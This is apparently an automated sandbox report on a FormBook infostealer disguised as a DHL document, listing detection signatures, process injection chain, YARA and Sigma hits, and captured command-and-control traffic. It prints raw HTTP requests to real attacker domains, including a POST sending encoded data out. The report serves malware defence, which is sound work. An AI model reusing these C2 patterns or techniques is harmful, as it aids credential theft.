Edit tour

Windows Analysis Report
DHL_doc.exe

Overview

General Information

Sample name:	DHL_doc.exe
Analysis ID:	1550802
MD5:	5fccc46e9f84dcbf89e7a5f6e316d48e
SHA1:	d8bcff20a113d39ce73d063060e458a7cc6a815d
SHA256:	09b4294185e7c2cf4ef94bf7b2a47ec7ce7187e0dcca67498443019ef53bcd02
Tags:	DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

DHL_doc.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\DHL_doc.exe" MD5: 5FCCC46E9F84DCBF89E7A5F6E316D48E)

svchost.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\DHL_doc.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

hubOySeXSAbhw.exe (PID: 5628 cmdline: "C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

AtBroker.exe (PID: 7520 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)

hubOySeXSAbhw.exe (PID: 4544 cmdline: "C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7780 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3567573313.0000000005450000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3566004775.0000000004B90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3566049277.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3564847310.0000000002E90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1958580078.00000000071C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1951242862.0000000000600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1951751697.0000000003800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3565909815.0000000002B80000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.600000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.600000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL_doc.exe", CommandLine: "C:\Users\user\Desktop\DHL_doc.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_doc.exe", ParentImage: C:\Users\user\Desktop\DHL_doc.exe, ParentProcessId: 7256, ParentProcessName: DHL_doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_doc.exe", ProcessId: 7276, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\DHL_doc.exe", CommandLine: "C:\Users\user\Desktop\DHL_doc.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_doc.exe", ParentImage: C:\Users\user\Desktop\DHL_doc.exe, ParentProcessId: 7256, ParentProcessName: DHL_doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_doc.exe", ProcessId: 7276, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T08:08:57.650987+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49730	TCP
2024-11-07T08:09:36.336417+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49738	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: DHL_doc.exe	ReversingLabs: Detection: 36%
Source: DHL_doc.exe	Virustotal: Detection: 29%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3567573313.0000000005450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566004775.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566049277.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3564847310.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958580078.00000000071C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951242862.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951751697.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3565909815.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DHL_doc.exe

Joe Sandbox ML: detected

Source: DHL_doc.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hubOySeXSAbhw.exe, 00000003.00000002.3564846691.000000000059E000.00000002.00000001.01000000.00000005.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3564848003.000000000059E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1919617894.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919532152.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000002.3565378032.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL_doc.exe, 00000000.00000003.1704911625.0000000004610000.00000004.00001000.00020000.00000000.sdmp, DHL_doc.exe, 00000000.00000003.1703872587.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855867126.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849902640.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.1997323348.0000000004C23000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.1995290391.0000000004A72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL_doc.exe, 00000000.00000003.1704911625.0000000004610000.00000004.00001000.00020000.00000000.sdmp, DHL_doc.exe, 00000000.00000003.1703872587.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1855867126.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849902640.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951474485.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000004.00000003.1997323348.0000000004C23000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566190507.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.1995290391.0000000004A72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: AtBroker.exe, 00000004.00000002.3566599950.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3565066450.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065968066.000000000301C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C1EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1919617894.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919532152.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000002.3565378032.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: AtBroker.exe, 00000004.00000002.3566599950.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3565066450.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065968066.000000000301C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C1EC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F368EE FindFirstFileW,FindClose,	0_2_00F368EE
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F3698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00F3698F
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F2D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F2D076
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F2D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F2D3A9
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F39642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F39642
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F3979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F3979D
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F2DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F2DBBE
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F39B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00F39B2B
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F35C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00F35C97
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EAC720 FindFirstFileW,FindNextFileW,FindClose,	4_2_02EAC720

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then xor eax, eax		4_2_02E99DE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_04CE04DF

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.68529.xyz

Source: Joe Sandbox View	IP Address: 81.169.145.95 81.169.145.95
Source: Joe Sandbox View	IP Address: 195.110.124.133 195.110.124.133

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F3CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_00F3CE44

Source: global traffic	HTTP traffic detected: GET /hzvv/?NbcPAHe=rORncVVdvgzWlpxpb9yAxBmqwfum8HsoM18MThSKdmZP0ohcmrwEBuX8zFjiIhpadHd1pz5OrNzpltMAb4bxQm02AY0asKkAwo7Ftw/RpgJscp/dfcLJk0A=&9Pj=rz_D HTTP/1.1Host: www.dpo-medicina.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /026w/?NbcPAHe=lYgGcuisybLP7Ls2RmpAG7O7UVmwB+Xi1NyGnRgJosPR9gPGPpYXP8moMcmegmveynv5+gYGX20ShvoOLspZRZz+Xfgi0XSdXD2iqff61Dw3F84CikMDqUU=&9Pj=rz_D HTTP/1.1Host: www.gold-rates.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /b8ns/?9Pj=rz_D&NbcPAHe=AHsT2lQM7afkvhgoTXaEPozK6vnsC2K6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0oJQYSGbyxd1Ea4wpo/x7IHrd/aWl4Cajac= HTTP/1.1Host: www.loginov.enterprisesAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1t94/?NbcPAHe=gjMIJwSCW/9UgfmAMdvHIdsDY5AHUjjwxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjcwSF2JZ6IaX0a+FZ1WtU911G5wO/kltYUU=&9Pj=rz_D HTTP/1.1Host: www.2925588.comAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pq4g/?9Pj=rz_D&NbcPAHe=/x7ZrZ76GI+PVQIB/efztiEAQuNtkt0VDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD8HSA5zGxCmzJwIJ9T37OSxmELpXH1Ey3c0= HTTP/1.1Host: www.treatyourownhip.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFBIBrVLT/+01tRxGHQ8IXkE2JVGDAaEVlxk=&9Pj=rz_D HTTP/1.1Host: www.premium303max.restAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xene/?9Pj=rz_D&NbcPAHe=oQfmtMAR504qWoErGCutl7x0yVR6q2g71CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEqUzXVZ73JGOh0p0dB8KyypZzDeumOcFOmM= HTTP/1.1Host: www.adsdomain-195.clickAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mivl/?NbcPAHe=NCBdkbAo51Pk6OQBAnBxM8uFnkri8kZDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK/ix96hDlK/5VhHaQOJqN2apQeXMRtfwTm8=&9Pj=rz_D HTTP/1.1Host: www.broork.sbsAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /uye5/?9Pj=rz_D&NbcPAHe=75F1ULhw6FwEjpnAOUSbF21mK8NkBCS+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rLiKH/gwOIhUvbn1b/q8x18okz/4WQ7XajQ= HTTP/1.1Host: www.nutrigenfit.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ak8m/?NbcPAHe=rnlDhCsdJ2ooBNmS/2ryiUnDiA99hEPBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQmTcYjl3T3IxdHP3y6mI4eFVbYE62DRlQ7k=&9Pj=rz_D HTTP/1.1Host: www.plyvik.infoAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.dpo-medicina.online
Source: global traffic	DNS traffic detected: DNS query: www.gold-rates.online
Source: global traffic	DNS traffic detected: DNS query: www.loginov.enterprises
Source: global traffic	DNS traffic detected: DNS query: www.2925588.com
Source: global traffic	DNS traffic detected: DNS query: www.treatyourownhip.online
Source: global traffic	DNS traffic detected: DNS query: www.premium303max.rest
Source: global traffic	DNS traffic detected: DNS query: www.adsdomain-195.click
Source: global traffic	DNS traffic detected: DNS query: www.broork.sbs
Source: global traffic	DNS traffic detected: DNS query: www.nutrigenfit.online
Source: global traffic	DNS traffic detected: DNS query: www.plyvik.info
Source: global traffic	DNS traffic detected: DNS query: www.68529.xyz

Source: unknown

HTTP traffic detected: POST /026w/ HTTP/1.1Host: www.gold-rates.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.gold-rates.onlineReferer: http://www.gold-rates.online/026w/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 204User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36Data Raw: 4e 62 63 50 41 48 65 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 31 72 39 4c 47 67 42 54 66 37 43 47 55 6c 7a 55 47 37 6a 6a 37 73 79 4b 6d 32 46 4f 68 4e 75 7a 6e 54 50 44 62 36 52 38 62 6f 32 48 47 63 75 4e 72 32 58 51 69 33 2b 4a 68 54 6f 41 41 6d 4a 6d 6e 64 64 58 41 38 63 65 62 6f 65 61 41 50 6f 46 34 55 66 43 63 79 36 30 6e 35 6e 31 77 78 42 56 54 4f 51 57 6f 6e 38 4f 6f 43 67 52 78 6a 6c 56 41 70 53 4b 50 55 6f 66 6a 62 75 4a 37 54 43 55 75 68 54 4b 57 55 7a 4f 52 6c 57 74 6b 59 5a 42 57 57 36 43 77 76 4c 72 59 6b 65 46 65 59 64 42 36 66 47 6b 75 39 6e 58 4d 48 32 69 35 30 63 4b 66 36 77 6e 31 41 3d 3d Data Ascii: NbcPAHe=oaImfau1/9zZ1r9LGgBTf7CGUlzUG7jj7syKm2FOhNuznTPDb6R8bo2HGcuNr2XQi3+JhToAAmJmnddXA8ceboeaAPoF4UfCcy60n5n1wxBVTOQWon8OoCgRxjlVApSKPUofjbuJ7TCUuhTKWUzORlWtkYZBWW6CwvLrYkeFeYdB6fGku9nXMH2i50cKf6wn1A==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:09:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 35 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 